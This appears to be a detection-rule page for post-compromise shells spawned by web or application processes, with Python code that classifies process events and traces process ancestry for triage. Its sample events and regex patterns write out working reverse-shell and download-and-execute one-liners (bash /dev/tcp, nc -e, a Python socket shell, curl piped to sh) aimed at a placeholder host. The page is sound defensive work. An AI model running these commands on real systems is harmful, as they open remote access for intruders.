Post compromise shell detected
What happened
The process {{ @process.comm }} was executed with arguments that indicate a post-compromise shell is being created for remote access.
Goal
Detect attempts to create an interactive shell from common web or application processes.
Strategy
Many applications (for example, databases, web servers, and search engines) run as long-lived service processes on the host. Attackers may exploit flaws in these applications, or in programs built on top of them (for example, SQL injection in a Java application backed by a database), to execute commands as that service process.
This detection triggers when such a process spawns a shell, a common shell utility, or an HTTP utility with arguments known to be used to establish an interactive or reverse shell on the targeted asset. If this is not expected behavior, it may indicate that an attacker has compromised the application and is establishing remote access to the host.
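The detection logic described above, as an added example over constructed process-exec events (it is not the rule definition behind this page): a child process is flagged when its parent is a web or application process and it is either an interactive shell or a shell, shell utility or HTTP utility whose arguments match well-known reverse-shell and download-and-execute idioms. The parent list, the argument patterns and the sample events are illustrative assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Parent process names (comm) that serve web or application traffic and are
# not expected to hand out interactive shells. Illustrative list, assumed here.
APP_PARENTS = {
    "java", "node", "php-fpm", "nginx", "httpd", "apache2",
    "postgres", "mysqld", "gunicorn", "uwsgi",
}

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}

# (reason, regex over the child's full command line). Each pattern is a
# well-known reverse-shell or download-and-execute idiom; constructed for
# this example, not the vendor's rule.
SUSPICIOUS_CMDLINE: List[Tuple[str, "re.Pattern[str]"]] = [
    ("bash network redirection", re.compile(r"/dev/(tcp|udp)/")),            # bash -i >& /dev/tcp/h/p 0>&1
    ("netcat exec flag", re.compile(r"(^|\s)-e\s+/bin/\S*sh\b")),            # nc -e /bin/sh h p
    ("socat exec to shell", re.compile(r"exec:[\"']?/bin/\S*sh")),           # socat tcp:h:p exec:/bin/sh,pty
    ("scripted socket connect", re.compile(r"socket\.socket\(|IO::Socket|fsockopen\(")),
    ("pty spawn", re.compile(r"pty\.spawn\(")),                              # python -c 'import pty;pty.spawn("/bin/sh")'
    ("pipe download to shell", re.compile(r"\|\s*(ba|da)?sh\b")),            # curl h/x.sh | sh
]


@dataclass
class ExecEvent:
    parent_comm: str    # comm of the parent process
    comm: str           # comm of the newly executed process
    args: List[str]     # argv; args[0] is the program name


def classify(ev: ExecEvent) -> Optional[str]:
    """Return a reason string if `ev` looks like a post-compromise shell, else None."""
    if ev.parent_comm not in APP_PARENTS:
        return None  # shells from sshd, cron or a terminal are out of scope for this rule
    cmdline = " ".join(ev.args)
    # An interactive shell directly under an application process is suspicious
    # on its own; "-i" is only checked as a standalone argument to a shell.
    if ev.comm in SHELLS and "-i" in ev.args[1:]:
        return "interactive shell spawned by an application process"
    for reason, pattern in SUSPICIOUS_CMDLINE:
        if pattern.search(cmdline):
            return reason
    return None


def run_detection(events: List[ExecEvent]) -> List[Tuple[ExecEvent, str]]:
    """Run classify() over a batch of events and keep the hits with their reasons."""
    hits = []
    for ev in events:
        reason = classify(ev)
        if reason is not None:
            hits.append((ev, reason))
    return hits


# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    ExecEvent("java", "bash", ["bash", "-i"]),
    ExecEvent("java", "bash", ["bash", "-c", "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"]),
    ExecEvent("nginx", "nc", ["nc", "-e", "/bin/sh", "10.0.0.5", "4444"]),
    ExecEvent("php-fpm", "sh", ["sh", "-c", "curl -s http://10.0.0.5/x.sh | sh"]),
    ExecEvent("gunicorn", "python3", ["python3", "-c",
              'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.5",4444));'
              'os.dup2(s.fileno(),0);subprocess.call(["/bin/sh","-i"])']),
    # Benign: the application runs a short non-interactive command.
    ExecEvent("java", "sh", ["sh", "-c", "ls -l /var/app/uploads"]),
    # Out of scope: an interactive shell from an administrator's SSH login.
    ExecEvent("sshd", "bash", ["bash", "-i"]),
]

if __name__ == "__main__":
    for ev, reason in run_detection(SAMPLE_EVENTS):
        print(f"{ev.parent_comm} -> {' '.join(ev.args)!r}: {reason}")
```

The parent allow-list is the part that needs tuning per environment: a build agent or a configuration-management daemon legitimately spawns `sh -c`, and a wrapper script that execs `bash -i` for an admin tool will trip the interactive-shell check, so expect to add exclusions rather than widen the patterns.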
Triage and response
- Determine the nature and purpose of the process.
- Determine whether there is an approved purpose for the process to execute shells and utilities.
- If this behavior is unexpected, attempt to contain the compromise (depending on the stage of the attack, this may be achieved by terminating the workload). Investigate application logs or APM data for indications of the initial compromise, and follow your organization's internal processes for investigating and remediating compromised systems.
- Find and repair the root cause of the exploit.
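The first two triage steps come down to establishing which service the flagged shell descends from and what else that service has spawned. As an added example (not part of the original page), the code below parses a constructed `ps -eo pid,ppid,comm,args` snapshot, walks the parent chain of the alerting PID back to the service that owns it, and lists the service's descendants, which is the set of processes a containment action would have to cover. The snapshot, PIDs and command lines are constructed for the example.

```python
from typing import Dict, List, Tuple

# Constructed `ps -eo pid,ppid,comm,args` output taken after an alert (not real data).
PS_SNAPSHOT = """\
  PID  PPID COMMAND         COMMAND
    1     0 systemd         /sbin/init
  812     1 sshd            /usr/sbin/sshd -D
 1204     1 java            /usr/bin/java -jar /opt/app/app.jar
 1377  1204 sh              sh -c bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
 1378  1377 bash            bash -i
 2210   812 sshd            sshd: admin [priv]
 2233  2210 bash            -bash
"""

# pid -> (ppid, comm, args)
ProcTable = Dict[int, Tuple[int, str, str]]


def parse_ps(snapshot: str) -> ProcTable:
    """Parse `ps -eo pid,ppid,comm,args` text into a process table."""
    table: ProcTable = {}
    for line in snapshot.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header or blank line
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        args = parts[3] if len(parts) == 4 else ""
        table[pid] = (ppid, comm, args)
    return table


def ancestry(pid: int, table: ProcTable) -> List[Tuple[int, str, str]]:
    """Return (pid, comm, args) from `pid` up to the root of the tree."""
    chain = []
    seen = set()
    while pid in table and pid not in seen:
        seen.add(pid)  # guard against a corrupt snapshot with a ppid cycle
        ppid, comm, args = table[pid]
        chain.append((pid, comm, args))
        pid = ppid
    return chain


def originating_service(pid: int, table: ProcTable) -> Tuple[int, str, str]:
    """The ancestor directly under PID 1, i.e. the service the process descends from."""
    chain = ancestry(pid, table)
    for entry in chain:
        if table[entry[0]][0] == 1:
            return entry
    return chain[-1]  # no PID 1 parent (partial snapshot): return the top of what we have


def descendants(pid: int, table: ProcTable) -> List[int]:
    """All PIDs below `pid`, breadth-first: the set a containment action must cover."""
    out: List[int] = []
    queue = [pid]
    while queue:
        current = queue.pop(0)
        children = sorted(p for p, (pp, _, _) in table.items() if pp == current)
        out.extend(children)
        queue.extend(children)
    return out


if __name__ == "__main__":
    table = parse_ps(PS_SNAPSHOT)
    alert_pid = 1378
    for p, comm, args in ancestry(alert_pid, table):
        print(f"{p:>6} {comm:<8} {args}")
    svc = originating_service(alert_pid, table)
    print(f"owning service: {svc[1]} (pid {svc[0]}); subtree to contain: {descendants(svc[0], table)}")
```

The contrast between PID 1378 (owned by `java`) and PID 2233 (owned by `sshd`) is exactly the judgement the triage steps ask for: the same `bash -i` is a routine admin login in one tree and a post-compromise shell in the other.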